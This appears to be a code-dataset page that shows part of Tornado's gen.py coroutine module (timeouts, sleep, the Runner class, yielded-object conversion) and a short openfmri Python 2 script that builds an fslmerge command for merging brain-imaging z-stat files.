If ``x`` is already a `.Future`, it is simply returned; otherwise
it is wrapped in a new `.Future`. This is suitable for use as
``result = yield gen.maybe_future(f())`` when you don't know whether
``f()`` returns a `.Future` or not.
"""
if is_future(x):
return x
else:
fut = Future()
fut.set_result(x)
return fut
def with_timeout(timeout, future, io_loop=None, quiet_exceptions=()):
"""Wraps a `.Future` in a timeout.
Raises `TimeoutError` if the input future does not complete before
``timeout``, which may be specified in any form allowed by
`.IOLoop.add_timeout` (i.e. a `datetime.timedelta` or an absolute time
relative to `.IOLoop.time`)
If the wrapped `.Future` fails after it has timed out, the exception
will be logged unless it is of a type contained in ``quiet_exceptions``
(which may be an exception type or a sequence of types).
Currently only supports Futures, not other `YieldPoint` classes.
.. versionadded:: 4.0
.. versionchanged:: 4.1
Added the ``quiet_exceptions`` argument and the logging of unhandled
exceptions.
"""
# TODO: allow yield points in addition to futures?
# Tricky to do with stack_context semantics.
#
# It's tempting to optimize this by cancelling the input future on timeout
# instead of creating a new one, but A) we can't know if we are the only
# one waiting on the input future, so cancelling it might disrupt other
# callers and B) concurrent futures can only be cancelled while they are
# in the queue, so cancellation cannot reliably bound our waiting time.
result = Future()
chain_future(future, result)
if io_loop is None:
io_loop = IOLoop.current()
def error_callback(future):
try:
future.result()
except Exception as e:
if not isinstance(e, quiet_exceptions):
app_log.error("Exception in Future %r after timeout",
future, exc_info=True)
def timeout_callback():
result.set_exception(TimeoutError("Timeout"))
# In case the wrapped future goes on to fail, log it.
future.add_done_callback(error_callback)
timeout_handle = io_loop.add_timeout(
timeout, timeout_callback)
if isinstance(future, Future):
# We know this future will resolve on the IOLoop, so we don't
# need the extra thread-safety of IOLoop.add_future (and we also
# don't care about StackContext here.
future.add_done_callback(
lambda future: io_loop.remove_timeout(timeout_handle))
else:
# concurrent.futures.Futures may resolve on any thread, so we
# need to route them back to the IOLoop.
io_loop.add_future(
future, lambda future: io_loop.remove_timeout(timeout_handle))
return result
def sleep(duration):
"""Return a `.Future` that resolves after the given number of seconds.
When used with ``yield`` in a coroutine, this is a non-blocking
analogue to `time.sleep` (which should not be used in coroutines
because it is blocking)::
yield gen.sleep(0.5)
Note that calling this function on its own does nothing; you must
wait on the `.Future` it returns (usually by yielding it).
.. versionadded:: 4.1
"""
f = Future()
IOLoop.current().call_later(duration, lambda: f.set_result(None))
return f
_null_future = Future()
_null_future.set_result(None)
moment = Future()
moment.__doc__ = \
"""A special object which may be yielded to allow the IOLoop to run for
one iteration.
This is not needed in normal use but it can be helpful in long-running
coroutines that are likely to yield Futures that are ready instantly.
Usage: ``yield gen.moment``
.. versionadded:: 4.0
"""
moment.set_result(None)
class Runner(object):
"""Internal implementation of `tornado.gen.engine`.
Maintains information about pending callbacks and their results.
The results of the generator are stored in ``result_future`` (a
`.TracebackFuture`)
"""
def __init__(self, gen, result_future, first_yielded):
self.gen = gen
self.result_future = result_future
self.future = _null_future
self.yield_point = None
self.pending_callbacks = None
self.results = None
self.running = False
self.finished = False
self.had_exception = False
self.io_loop = IOLoop.current()
# For efficiency, we do not create a stack context until we
# reach a YieldPoint (stack contexts are required for the historical
# semantics of YieldPoints, but not for Futures). When we have
# done so, this field will be set and must be called at the end
# of the coroutine.
self.stack_context_deactivate = None
if self.handle_yield(first_yielded):
self.run()
def register_callback(self, key):
"""Adds ``key`` to the list of callbacks."""
if self.pending_callbacks is None:
# Lazily initialize the old-style YieldPoint data structures.
self.pending_callbacks = set()
self.results = {}
if key in self.pending_callbacks:
raise KeyReuseError("key %r is already pending" % (key,))
self.pending_callbacks.add(key)
def is_ready(self, key):
"""Returns true if a result is available for ``key``."""
if self.pending_callbacks is None or key not in self.pending_callbacks:
raise UnknownKeyError("key %r is not pending" % (key,))
return key in self.results
def set_result(self, key, result):
"""Sets the result for ``key`` and attempts to resume the generator."""
self.results[key] = result
if self.yield_point is not None and self.yield_point.is_ready():
try:
self.future.set_result(self.yield_point.get_result())
except:
self.future.set_exc_info(sys.exc_info())
self.yield_point = None
self.run()
def pop_result(self, key):
"""Returns the result for ``key`` and unregisters it."""
self.pending_callbacks.remove(key)
return self.results.pop(key)
def run(self):
"""Starts or resumes the generator, running until it reaches a
yield point that is not ready.
"""
if self.running or self.finished:
return
try:
self.running = True
while True:
future = self.future
if not future.done():
return
self.future = None
try:
orig_stack_contexts = stack_context._state.contexts
exc_info = None
try:
value = future.result()
except Exception:
self.had_exception = True
exc_info = sys.exc_info()
if exc_info is not None:
yielded = self.gen.throw(*exc_info)
exc_info = None
else:
yielded = self.gen.send(value)
if stack_context._state.contexts is not orig_stack_contexts:
self.gen.throw(
stack_context.StackContextInconsistentError(
'stack_context inconsistency (probably caused '
'by yield within a "with StackContext" block)'))
except (StopIteration, Return) as e:
self.finished = True
self.future = _null_future
if self.pending_callbacks and not self.had_exception:
# If we ran cleanly without waiting on all callbacks
# raise an error (really more of a warning). If we
# had an exception then some callbacks may have been
# orphaned, so skip the check in that case.
raise LeakedCallbackError(
"finished without waiting for callbacks %r" %
self.pending_callbacks)
self.result_future.set_result(getattr(e, 'value', None))
self.result_future = None
self._deactivate_stack_context()
return
except Exception:
self.finished = True
self.future = _null_future
self.result_future.set_exc_info(sys.exc_info())
self.result_future = None
self._deactivate_stack_context()
return
if not self.handle_yield(yielded):
return
finally:
self.running = False
def handle_yield(self, yielded):
# Lists containing YieldPoints require stack contexts;
# other lists are handled via multi_future in convert_yielded.
if (isinstance(yielded, list) and
any(isinstance(f, YieldPoint) for f in yielded)):
yielded = Multi(yielded)
elif (isinstance(yielded, dict) and
any(isinstance(f, YieldPoint) for f in yielded.values())):
yielded = Multi(yielded)
if isinstance(yielded, YieldPoint):
# YieldPoints are too closely coupled to the Runner to go
# through the generic convert_yielded mechanism.
self.future = TracebackFuture()
def start_yield_point():
try:
yielded.start(self)
if yielded.is_ready():
self.future.set_result(
yielded.get_result())
else:
self.yield_point = yielded
except Exception:
self.future = TracebackFuture()
self.future.set_exc_info(sys.exc_info())
if self.stack_context_deactivate is None:
# Start a stack context if this is the first
# YieldPoint we've seen.
with stack_context.ExceptionStackContext(
self.handle_exception) as deactivate:
self.stack_context_deactivate = deactivate
def cb():
start_yield_point()
self.run()
self.io_loop.add_callback(cb)
return False
else:
start_yield_point()
else:
try:
self.future = convert_yielded(yielded)
except BadYieldError:
self.future = TracebackFuture()
self.future.set_exc_info(sys.exc_info())
if not self.future.done() or self.future is moment:
self.io_loop.add_future(
self.future, lambda f: self.run())
return False
return True
def result_callback(self, key):
return stack_context.wrap(_argument_adapter(
functools.partial(self.set_result, key)))
def handle_exception(self, typ, value, tb):
if not self.running and not self.finished:
self.future = TracebackFuture()
self.future.set_exc_info((typ, value, tb))
self.run()
return True
else:
return False
def _deactivate_stack_context(self):
if self.stack_context_deactivate is not None:
self.stack_context_deactivate()
self.stack_context_deactivate = None
Arguments = collections.namedtuple('Arguments', ['args', 'kwargs'])
def _argument_adapter(callback):
"""Returns a function that when invoked runs ``callback`` with one arg.
If the function returned by this function is called with exactly
one argument, that argument is passed to ``callback``. Otherwise
the args tuple and kwargs dict are wrapped in an `Arguments` object.
"""
def wrapper(*args, **kwargs):
if kwargs or len(args) > 1:
callback(Arguments(args, kwargs))
elif args:
callback(args[0])
else:
callback(None)
return wrapper
if sys.version_info >= (3, 3):
exec(textwrap.dedent("""
@coroutine
def _wrap_awaitable(x):
return (yield from x)
"""))
else:
def _wrap_awaitable(x):
raise NotImplementedError()
def convert_yielded(yielded):
"""Convert a yielded object into a `.Future`.
The default implementation accepts lists, dictionaries, and Futures.
If the `~functools.singledispatch` library is available, this function
may be extended to support additional types. For example::
@convert_yielded.register(asyncio.Future)
def _(asyncio_future):
return tornado.platform.asyncio.to_tornado_future(asyncio_future)
.. versionadded:: 4.1
"""
# Lists and dicts containing YieldPoints were handled separately
# via Multi().
if isinstance(yielded, (list, dict)):
return multi_future(yielded)
elif is_future(yielded):
return yielded
elif isawaitable(yielded):
return _wrap_awaitable(yielded)
else:
raise BadYieldError("yielded unknown object %r" % (yielded,))
if singledispatch is not None:
convert_yielded = singledispatch(convert_yielded)
| apache-2.0 |
poldrack/openfmri | openfmri_paper/2.8_make_allmean_file.py | 1 | 1497 | """
make alist of all contrasts/tasks
"""
import pickle
from get_contrasts_to_use import *
c=get_contrasts_to_use()
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
infodir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
f=open(os.path.join(infodir,'task_keys.pkl'),'rb')
task_keys=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_contrasts.pkl'),'rb')
contrasts=pickle.load(f)
f.close()
f=open(os.path.join(infodir,'task_conditions.pkl'),'rb')
condition_keys=pickle.load(f)
f.close()
taskctr={'ds001': {1: 1},
'ds002': {1: 2, 2: 3, 3: 4},
'ds003': {1: 5},
'ds005': {1: 6},
'ds006A': {1: 7},
'ds007': {1: 8, 2: 9, 3: 10},
'ds008': {1: 11, 2: 12},
'ds011': {1: 13, 2: 14, 3: 15, 4: 16},
'ds017': {2: 17},
'ds051': {1: 18},
'ds052': {1: 19, 2: 20},
'ds101': {1: 21},
'ds102': {1: 22},
'ds107': {1: 23}}
taskdict={}
for ds in taskctr.iterkeys():
for t in taskctr[ds].iterkeys():
taskdict[taskctr[ds][t]]=[ds,t,task_keys[ds]['task%03d'%t],c[ds][t][0],contrasts[ds]['task%03d'%t]['contrasts'][c[ds][t][0]]]
meanzstatdir='/corral-repl/utexas/poldracklab/openfmri/shared2/mean_zstat/'
outdir='/corral-repl/utexas/poldracklab/openfmri/analyses/paper_analysis_Dec2012/data_prep'
cmd='fslmerge -t %s/all_mean_zstat.nii.gz'%outdir
for t in range(1,24):
cmd += ' %s/mean_%s_task%03d_zstat%d_run1.nii.gz'%(meanzstatdir,taskdict[t][0],taskdict[t][1],taskdict[t][3])
print cmd
| bsd-2-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.